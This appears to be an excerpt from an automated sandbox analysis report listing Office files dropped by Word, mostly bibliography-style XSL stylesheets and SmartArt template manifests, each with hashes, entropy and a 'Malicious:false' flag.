                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):278
                                                                                                                                                        Entropy (8bit):3.5280239200222887
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:877A8A960B2140E3A0A2752550959DB9
                                                                                                                                                        SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                                                                                                                        SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                                                                                                                        SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File]; OriginalName: gb.xsl; Component: WordFiles; ReqVer: 14; Executable: {WD}; StoreLocation: {My Templates}; Command: /f {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):268317
                                                                                                                                                        Entropy (8bit):5.05419861997223
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                                        MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                                        SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                                        SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                                        SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):252
                                                                                                                                                        Entropy (8bit):3.48087342759872
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                                                                                                                        MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                                                                                                                        SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                                                                                                                        SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                                                                                                                        SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4326
                                                                                                                                                        Entropy (8bit):7.821066198539098
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                        MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                        SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                        SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                        SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):280
                                                                                                                                                        Entropy (8bit):3.484503080761839
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                                                                                                                        MD5:1309D172F10DD53911779C89A06BBF65
                                                                                                                                                        SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                                                                                                                        SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                                                                                                                        SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):9191
                                                                                                                                                        Entropy (8bit):7.93263830735235
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                        MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                        SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                                        SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                        SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):260
                                                                                                                                                        Entropy (8bit):3.494357416502254
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                                                                                                                        MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                                                                                                                        SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                                                                                                                        SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                                                                                                                        SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6193
                                                                                                                                                        Entropy (8bit):7.855499268199703
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                        MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                        SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                        SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                        SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):238
                                                                                                                                                        Entropy (8bit):3.472155835869843
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                                                                                                                        MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                                                                                                                        SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                                                                                                                        SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                                                                                                                        SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5151
                                                                                                                                                        Entropy (8bit):7.859615916913808
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                        MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                        SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                        SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                        SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):16806
                                                                                                                                                        Entropy (8bit):7.9519793977093505
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                                        MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                                        SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                                        SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                                        SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):254
                                                                                                                                                        Entropy (8bit):3.4720677950594836
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                                                                                                                        MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                                                                                                                        SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                                                                                                                        SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                                                                                                                        SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):333258
                                                                                                                                                        Entropy (8bit):4.654450340871081
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                                        MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                                        SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                                        SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                                        SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):328
                                                                                                                                                        Entropy (8bit):3.541819892045459
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                                                                                                                        SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                                                                                                                        SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                                                                                                                        SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):290
                                                                                                                                                        Entropy (8bit):3.5161159456784024
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                                                                                                                        SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                                                                                                                        SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                                                                                                                        SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):344303
                                                                                                                                                        Entropy (8bit):5.023195898304535
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                                        MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                                        SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                                        SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                                        SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):314
                                                                                                                                                        Entropy (8bit):3.5230842510951934
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                                                                                                                        SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                                                                                                                        SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                                                                                                                        SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):294178
                                                                                                                                                        Entropy (8bit):4.977758311135714
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                                        MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                                        SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                                        SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                                        SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):274
                                                                                                                                                        Entropy (8bit):3.438490642908344
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                        MD5:0F98498818DC28E82597356E2650773C
                                                                                                                                                        SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                                                                                                                        SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                                                                                                                        SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):34415
                                                                                                                                                        Entropy (8bit):7.352974342178997
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                        MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                        SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                        SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                        SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                        Malicious:false
